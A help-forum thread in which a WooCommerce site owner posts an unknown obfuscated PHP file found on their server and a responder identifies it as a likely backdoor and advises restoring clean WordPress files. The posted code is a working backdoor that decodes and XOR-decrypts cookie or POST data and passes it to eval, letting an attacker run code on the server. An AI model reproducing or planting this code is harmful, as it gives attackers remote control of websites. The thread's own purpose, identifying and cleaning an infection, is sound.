By Rashid Rcp


2019-02-11 05:47:22 8 Comments

My woo-commerce site contain a some unknowing PHP file, that i cant find out its purpose.

Here is the sample of the code ,

<?php
$qyxrjyu = 'vxoa_6p*5ci#0l1e4nH7mdsk-rg2t3u9by\'';$dtwaxz = Array();$dtwaxz[] = $qyxrjyu[18].$qyxrjyu[7];$dtwaxz[] = $qyxrjyu[11];$dtwaxz[] = $qyxrjyu[21].$qyxrjyu[14].$qyxrjyu[29].$qyxrjyu[27].$qyxrjyu[19].$qyxrjyu[21].$qyxrjyu[5].$qyxrjyu[12].$qyxrjyu[24].$qyxrjyu[31].$qyxrjyu[3].$qyxrjyu[27].$qyxrjyu[16].$qyxrjyu[24].$qyxrjyu[16].$qyxrjyu[12].$qyxrjyu[8].$qyxrjyu[15].$qyxrjyu[24].$qyxrjyu[32].$qyxrjyu[16].$qyxrjyu[29].$qyxrjyu[8].$qyxrjyu[24].$qyxrjyu[15].$qyxrjyu[14].$qyxrjyu[31].$qyxrjyu[8].$qyxrjyu[8].$qyxrjyu[9].$qyxrjyu[16].$qyxrjyu[31].$qyxrjyu[29].$qyxrjyu[8].$qyxrjyu[29].$qyxrjyu[19];$dtwaxz[] = $qyxrjyu[9].$qyxrjyu[2].$qyxrjyu[30].$qyxrjyu[17].$qyxrjyu[28];$dtwaxz[] = $qyxrjyu[22].$qyxrjyu[28].$qyxrjyu[25].$qyxrjyu[4].$qyxrjyu[25].$qyxrjyu[15].$qyxrjyu[6].$qyxrjyu[15].$qyxrjyu[3].$qyxrjyu[28];$dtwaxz[] = $qyxrjyu[15].$qyxrjyu[1].$qyxrjyu[6].$qyxrjyu[13].$qyxrjyu[2].$qyxrjyu[21].$qyxrjyu[15];$dtwaxz[] = $qyxrjyu[22].$qyxrjyu[30].$qyxrjyu[32].$qyxrjyu[22].$qyxrjyu[28].$qyxrjyu[25];$dtwaxz[] = $qyxrjyu[3].$qyxrjyu[25].$qyxrjyu[25].$qyxrjyu[3].$qyxrjyu[33].$qyxrjyu[4].$qyxrjyu[20].$qyxrjyu[15].$qyxrjyu[25].$qyxrjyu[26].$qyxrjyu[15];$dtwaxz[] = $qyxrjyu[22].$qyxrjyu[28].$qyxrjyu[25].$qyxrjyu[13].$qyxrjyu[15].$qyxrjyu[17];$dtwaxz[] = $qyxrjyu[6].$qyxrjyu[3].$qyxrjyu[9].$qyxrjyu[23];foreach ($dtwaxz[7]($_COOKIE, $_POST) as $gitjw => $lsobabb){function mmkwylm($dtwaxz, $gitjw, $wkzdbr){return $dtwaxz[6]($dtwaxz[4]($gitjw . $dtwaxz[2], ($wkzdbr / $dtwaxz[8]($gitjw)) + 1), 0, $wkzdbr);}function irbcfeg($dtwaxz, $bgmei){return @$dtwaxz[9]($dtwaxz[0], $bgmei);}function obdaxad($dtwaxz, $bgmei){$pswrfp = $dtwaxz[3]($bgmei) % 3;if (!$pswrfp) {eval($bgmei[1]($bgmei[2]));exit();}}$lsobabb = irbcfeg($dtwaxz, $lsobabb);obdaxad($dtwaxz, $dtwaxz[5]($dtwaxz[1], $lsobabb ^ mmkwylm($dtwaxz, $gitjw, $dtwaxz[8]($lsobabb))));}

Could any one explain me whats the purpose of these code?

Thanks.

1 comments

@Krzysiek Dróżdż 2019-02-11 06:06:56

It’s definitely not a file from WordPress.

It’s a file with obfuscated code, so it’s hard to read and say what it does exactly.

Most probably it’s a backdoor or some other malicious file lest on your server by attacker/malware infection.

@Rashid Rcp 2019-02-11 07:57:19

I Think so, my site also facing redirecting to a Spam site issue.

@Krzysiek Dróżdż 2019-02-11 07:59:50

@RashidRcp so yeah - it’s infected. Now you have to clean it and secure it properly - otherwise it will get infected again.

@Rashid Rcp 2019-02-11 08:07:12

Could you suggest any options to solve this issue?

@Krzysiek Dróżdż 2019-02-11 08:16:27

@RashidRcp for cleaning? Yeah - restore original files of WP, plugins and themes. Then scan all the DB and other files and search for any malicious scripts. And when you’re certain that the site is clean, then configure it properly.

Related Questions

Sponsored Content

1 Answered Questions

Modify "New Order" email contents and recipient(s)

1 Answered Questions

2 Answered Questions

[SOLVED] how i can add more required * fields in checkout page?

  • 2017-03-02 06:01:32
  • adel
  • 1018 View
  • 1 Score
  • 2 Answer
  • Tags:   woocommerce

1 Answered Questions

2 Answered Questions

[SOLVED] Get custom category image from menu

1 Answered Questions

Sponsored Content